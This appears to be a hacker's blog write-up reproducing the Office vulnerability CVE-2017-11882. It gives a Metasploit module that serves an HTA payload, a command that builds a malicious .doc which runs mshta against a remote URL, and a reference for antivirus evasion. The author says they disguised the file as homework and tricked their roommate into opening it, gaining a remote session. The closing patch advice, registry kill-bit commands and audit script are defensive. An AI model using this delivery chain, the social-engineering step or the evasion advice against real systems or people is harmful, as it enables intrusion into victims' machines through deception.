# CVE-2017-11882 Reproduction

## 0x00 Preface ##

> The latest code-execution vulnerability affecting every Office version: no macros needed, no prompt. I wanted to reproduce it as soon as it came out; today I was lucky enough to have some spare time, so I set a little aside to reproduce this bug. This is purely a reproduction write-up, so experts, go easy on me.

## 0x01 Reproduction Process ##

> I ran into all sorts of annoying problems while reproducing it. At first I used my own physical machine (Win10 + Office 2016), but it just would not work: the calculator would not pop up no matter what. After doubting everything, I finally reproduced it successfully on my roommate's laptop (Win10 + Office 2010).
>
> Here we use the script improved by Ridter: [https://github.com/Ridter/CVE-2017-11882/][1]
> CVE-2017-11882.rb

```
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Office Payload Delivery',
      'Description'    => %q{
        This module generates a command to place within a Word document that,
        when executed, will retrieve an HTA payload via HTTP from a web server.
        Currently have not figured out how to generate a doc.
      },
      'License'        => MSF_LICENSE,
      'Arch'           => ARCH_X86,
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Automatic', {} ],
        ],
      'DefaultTarget'  => 0,
    ))
  end

  # Serve the HTA payload to whoever requests the module's URI
  def on_request_uri(cli, _request)
    print_status("Delivering payload")
    p = regenerate_payload(cli)
    data = Msf::Util::EXE.to_executable_fmt(
      framework,
      ARCH_X86,
      'win',
      p.encoded,
      'hta-psh',
      { :arch => ARCH_X86, :platform => 'win' }
    )
    send_response(cli, data, 'Content-Type' => 'application/hta')
  end

  # Print the command that the document is expected to launch
  def primer
    url = get_uri
    print_status("Place the following DDE in an MS document:")
    print_line("mshta.exe \"#{url}\"")
  end
end
```

Here is also the latest official msf module for reference: [https://raw.githubusercontent.com/realoriginal/metasploit-framework/39a4d193a17c6f85846a58a429c0914f542bded2/modules/exploits/windows/fileformat/office_ms17_11882.rb][2]

We first open msf and use the module above to configure and generate the mshta URL.

![222.PNG][3]

Then copy the mshta address we obtained into Ridter's improved script to generate the doc file:

```
python Command_CVE-2017-11882.py -c "mshta http://192.168.1.8:8080/sJ0u6yRR" -o test.doc
```

![11.PNG][4]

I disguised that document as a normal homework assignment and sent it to my roommate to trick him into opening it.

![微信图片_20171122210023.png][5]

At that point our msf side got a session.

![1.PNG][6]
![2.PNG][7]
![捕获.PNG][8]

## 0x02 AV Evasion ##

> Because mshta has been abused so much, it is easily flagged. During today's test it was immediately flagged as malicious by 360.
> You can refer to this article by 倾旋 for AV evasion: [http://payloads.online/archivers/2017-11-08/1][9]

## 0x03 Vulnerability Fix ##

1. Download Microsoft's patch for this vulnerability: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882, and enable automatic updates.
2. Disable the vulnerable module (the Equation Editor COM object) in the registry:

```
reg add "HKLM\SOFTWARE\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
```

[1]: https://github.com/Ridter/CVE-2017-11882/
[2]: https://raw.githubusercontent.com/realoriginal/metasploit-framework/39a4d193a17c6f85846a58a429c0914f542bded2/modules/exploits/windows/fileformat/office_ms17_11882.rb
[3]: http://www.lovei.org/usr/uploads/2017/11/1895559743.png
[4]: http://www.lovei.org/usr/uploads/2017/11/669709062.png
[5]: http://www.lovei.org/usr/uploads/2017/11/3361604605.png
[6]: http://www.lovei.org/usr/uploads/2017/11/3365975425.png
[7]: http://www.lovei.org/usr/uploads/2017/11/3369984649.png
[8]: http://www.lovei.org/usr/uploads/2017/11/4100346204.png
[9]: http://payloads.online/archivers/2017-11-08/1
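The two `reg add` commands in the fix section set the COM kill bit for the Equation Editor CLSID one Office version (`XX.X`) at a time. The following audit script is an added example, not part of the original post: it enumerates every installed Office version key under both the native and Wow6432Node hives and reports whether `Compatibility Flags` has the 0x400 bit set, assuming the key layout shown above.

```powershell
# Added audit script (not from the original post). Checks whether the
# Equation Editor COM kill bit (Compatibility Flags bit 0x400) is set for
# every installed Office version, in both registry views. Run as Administrator.
$Clsid = '{0002CE02-0000-0000-C000-000000000046}'
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Office',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Office'
)

function Test-EquationEditorKillBit {
    $results = @()
    foreach ($root in $Roots) {
        if (-not (Test-Path $root)) { continue }
        # Office version keys look like 12.0, 14.0, 15.0, 16.0 (the XX.X placeholder above)
        Get-ChildItem $root | Where-Object { $_.PSChildName -match '^\d+\.\d+$' } | ForEach-Object {
            $ver   = $_.PSChildName
            $key   = "$root\$ver\Common\COM Compatibility\$Clsid"
            $flags = $null
            if (Test-Path $key) {
                $flags = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' `
                          -ErrorAction SilentlyContinue).'Compatibility Flags'
            }
            # 0x400 is the "do not load" kill bit; any other value leaves the control loadable
            $blocked = ($null -ne $flags) -and (($flags -band 0x400) -ne 0)
            $results += [pscustomobject]@{
                Hive    = $root
                Version = $ver
                Flags   = if ($null -eq $flags) { 'not set' } else { '0x{0:X}' -f $flags }
                Blocked = $blocked
            }
        }
    }
    return $results
}

$audit = Test-EquationEditorKillBit
$audit | Format-Table -AutoSize
if ($audit.Count -eq 0) {
    Write-Warning 'No Office version keys found; nothing to audit.'
} elseif ($audit | Where-Object { -not $_.Blocked }) {
    Write-Warning 'At least one Office install can still load the Equation Editor via COM; apply the patch or the reg add commands above.'
}
```

A version key can exist without Office actually being installed for it (leftover from an upgrade), so a `not set` row for an old version may be harmless; the rows for the version you actually run are the ones that matter.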